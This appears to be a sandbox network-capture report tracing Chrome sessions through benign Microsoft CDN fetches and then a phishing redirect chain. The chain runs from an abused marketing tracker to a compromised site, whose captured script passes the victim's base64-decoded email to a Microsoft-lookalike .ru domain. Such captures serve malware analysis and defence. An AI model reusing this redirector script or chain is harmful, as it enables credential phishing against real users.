                                                                                                                          75192.168.2.164981013.107.246.414435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:00 UTC421OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                                                                                                          Host: logincdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:18:00 UTC734INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:00 GMT
                                                                                                                          Content-Type: image/gif
                                                                                                                          Content-Length: 3620
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:22:50 GMT
                                                                                                                          ETag: 0x8DB5C40D3BB06B9
                                                                                                                          x-ms-request-id: 703fd349-301e-009c-0fd7-55241d000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          x-azure-ref: 20240202T191800Z-bhu4n2hwzh2xzfpvezs73vt9g800000004v000000000cpbx
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-02-02 19:18:00 UTC3620INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 0f
                                                                                                                          Data Ascii: GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`9


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          76192.168.2.164981113.107.246.414435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:00 UTC421OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                                          Host: logincdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:18:00 UTC778INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:00 GMT
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Content-Length: 673
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:22:46 GMT
                                                                                                                          ETag: 0x8DB5C40D14F1C27
                                                                                                                          x-ms-request-id: aa48ceb2-701e-0074-4475-53697b000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          x-azure-ref: 20240202T191800Z-7zpv6s0vgt2kpfgx4p4cc875nw00000007g000000000094x
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-02-02 19:18:00 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                                                                          Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          77192.168.2.164981213.107.246.414435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:00 UTC422OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                                                                          Host: logincdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:18:00 UTC779INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:00 GMT
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Content-Length: 1435
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:22:50 GMT
                                                                                                                          ETag: 0x8DB5C40D3A66EC0
                                                                                                                          x-ms-request-id: 81e05eb7-d01e-0042-2bfa-51b266000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          x-azure-ref: 20240202T191800Z-s9rt41xvpd2158uhu922qnyp7g00000003hg00000000fbfx
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-02-02 19:18:00 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                                                                          Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          78192.168.2.164981313.107.246.414435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:00 UTC379OUTGET /16.000.30091.10/images/favicon.ico HTTP/1.1
                                                                                                                          Host: logincdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:18:01 UTC738INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:00 GMT
                                                                                                                          Content-Type: image/x-icon
                                                                                                                          Content-Length: 17174
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Last-Modified: Fri, 26 Jan 2024 01:34:16 GMT
                                                                                                                          ETag: 0x8DC1E0EE8F30E67
                                                                                                                          x-ms-request-id: 35ba27f3-e01e-0049-251b-539771000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          x-azure-ref: 20240202T191800Z-kh326adv1152v2uq39mebpct54000000056000000000526g
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-02-02 19:18:01 UTC15646INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                                                                                          Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                                                                                          2024-02-02 19:18:01 UTC1528INData Raw: 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22
                                                                                                                          Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          79192.168.2.164981720.12.23.50443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:17 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XN7tdkbw6C3m8Lv&MD=htgtz4Vy HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                          2024-02-02 19:18:17 UTC560INHTTP/1.1 200 OK
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Expires: -1
                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                          ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                          MS-CorrelationId: 8738ee3b-fae7-44a8-a4e3-4f1d9ccf7880
                                                                                                                          MS-RequestId: a449f6fe-b3ee-42b2-b71b-c6dfb7baa228
                                                                                                                          MS-CV: 6fok4dZU80mB976u.0
                                                                                                                          X-Microsoft-SLSClientCache: 2160
                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:17 GMT
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 25457
                                                                                                                          2024-02-02 19:18:17 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                          Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                          2024-02-02 19:18:17 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                          Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          80192.168.2.164975935.181.229.1384435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:22 UTC1117OUTGET /c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit HTTP/1.1
                                                                                                                          Host: sushishop.commander1.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: tc_cj_v2_cmp=LJLMKKLQy%20%28%7B%24%27y-%20%27%7B%29%7D%20y%7B%2B%2BMJy%7C%20%21-; tc_cj_v2_med=%7B%7D%2F0; TCID=16fae09848cf2bf078ca3f065e274a8a; TCSESSION=20240202201741992404317; TCREDIRECT=1; TCREDIRECT_DEDUP=1; tc_cj_v2=%20%28%7B%24%27%24%29%22ZZZ%29%20%2A%27%7B%29%20ZZZKQJPSJKNPSJJJZZZ%5Dfc%5De
                                                                                                                          2024-02-02 19:18:22 UTC1386INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:22 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
                                                                                                                          Set-Cookie: tc_cj_v2=%20%28%7B%24%27%24%29%22ZZZ%29%20%2A%27%7B%29%20ZZZKQJPSJKOJLJJJZZZ%5Dfc%5De; expires=Sat, 01-Feb-2025 19:18:22 GMT; Max-Age=31536000; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: tc_cj_v2_cmp=LJLMKKLQy%20%28%7B%24%27y-%20%27%7B%29%7D%20y%7B%2B%2BMJy%7C%20%21-; expires=Sat, 01-Feb-2025 19:18:22 GMT; Max-Age=31536000; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: tc_cj_v2_med=%7B%7D%2F0; expires=Sat, 01-Feb-2025 19:18:22 GMT; Max-Age=31536000; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: TCID=16fae09848cf2bf078ca3f065e274a8a; expires=Sat, 01-Feb-2025 19:18:22 GMT; Max-Age=31536000; path=/; domain=.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: TCSESSION=20240202201741992404317; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: TCREDIRECT=1; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: TCREDIRECT_DEDUP=1; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          location: //galeonconstruction.com/nin/niit
                                                                                                                          Server: web
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          2024-02-02 19:18:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          81192.168.2.1649819162.241.124.474435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:22 UTC674OUTGET /nin/niit/ HTTP/1.1
                                                                                                                          Host: galeonconstruction.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:18:23 UTC159INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:22 GMT
                                                                                                                          Server: Apache
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          2024-02-02 19:18:23 UTC239INData Raw: 65 34 0d 0a 3c 73 63 72 69 70 74 3e 20 0a 20 0a 76 61 72 20 65 6d 61 69 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 28 31 29 3b 76 61 72 20 64 65 63 6f 64 65 64 53 74 72 69 6e 67 20 3d 20 61 74 6f 62 28 65 6d 61 69 6c 29 3b 20 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6d 69 63 72 6f 73 6f 66 74 2d 64 32 76 6b 62 6d 76 7a 77 7a 67 66 2e 71 32 7a 67 32 32 2e 72 75 2f 6d 61 69 6c 2f 69 6e 62 6f 78 2f 23 27 20 2b 20 64 65 63 6f 64 65 64 53 74 72 69 6e 67 3b 20 7d 29 3b 20 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: e4<script> var email = window.location.hash.substr(1);var decodedString = atob(email); window.setTimeout(function() {window.location.href = 'https://microsoft-d2vkbmvzwzgf.q2zg22.ru/mail/inbox/#' + decodedString; }); </script>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          82192.168.2.1649820104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:23 UTC997OUTGET /mail/inbox/ HTTP/1.1
                                                                                                                          Host: microsoft-d2vkbmvzwzgf.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Referer: https://galeonconstruction.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=
                                                                                                                          2024-02-02 19:18:23 UTC706INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:23 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Location: https://office.q2zg22.ru/
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AZG3azd%2BAZ8%2B6Ch4E18xDucJa9qh6hA3v%2Fy3%2BUW%2FYf1wzF%2B97CakslcizEr6tqfGB1n1UL6mUqkJySLdqa4L0dFUSblMJcqTc9EzcLqHSDzO3GV39GLNndvlmdyd88YVUPiitMlRY8TolkDxsUtJRV5giA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c79dcc5653b7-ATL
